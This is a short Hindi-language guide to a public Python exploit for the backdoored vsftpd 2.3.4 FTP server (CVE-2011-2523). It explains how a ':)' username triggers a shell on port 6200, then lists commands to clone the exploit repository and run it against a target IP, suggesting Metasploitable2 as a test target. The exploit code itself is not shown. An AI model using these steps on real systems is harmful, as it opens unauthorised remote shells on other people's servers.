
vsftpd 2.3.4 के लिए Python एक्सप्लॉइट - Backdoor Command Execution
vsftpd, जो Very Secure FTP Daemon के रूप में जाना जाता है, Unix-जैसे सिस्टम (Linux सहित) के लिए एक FTP सर्वर है। यह GNU जनरल पब्लिक लाइसेंस के अंतर्गत लाइसेंस प्राप्त है। यह IPv6 और SSL का समर्थन करता है।
जुलाई 2011 में, यह पता चला कि मास्टर साइट से डाउनलोड किया जाने वाला vsftpd संस्करण 2.3.4 से समझौता किया गया था। एक समझौता किए गए vsftpd-2.3.4 सर्वर में लॉग इन करने वाले उपयोगकर्ता उपयोगकर्ता नाम के रूप में :) स्माइली चेहरा दे सकते हैं और पोर्ट 6200 पर एक कमांड शेल प्राप्त कर सकते हैं। यह vsftpd में किसी सुरक्षा छेद का मुद्दा नहीं था, बल्कि किसी ने vsftpd का एक अलग संस्करण अपलोड किया था जिसमें एक बैकडोर था। तब से, साइट को Google App Engine पर स्थानांतरित कर दिया गया।
sudo apt update
sudo apt install python3
sudo apt install python3-pip
pip install argparse
git clone https://github.com/padsalatushal/CVE-2011-2523.git
cd ./CVE-2011-2523
chmod +x exploit.py
python3 exploit.py -host Target_IP
उदाहरण : python3 exploit.py -host 192.168.168.128

आप Metasploitable2 पर एक्सप्लॉइट का परीक्षण कर सकते हैं।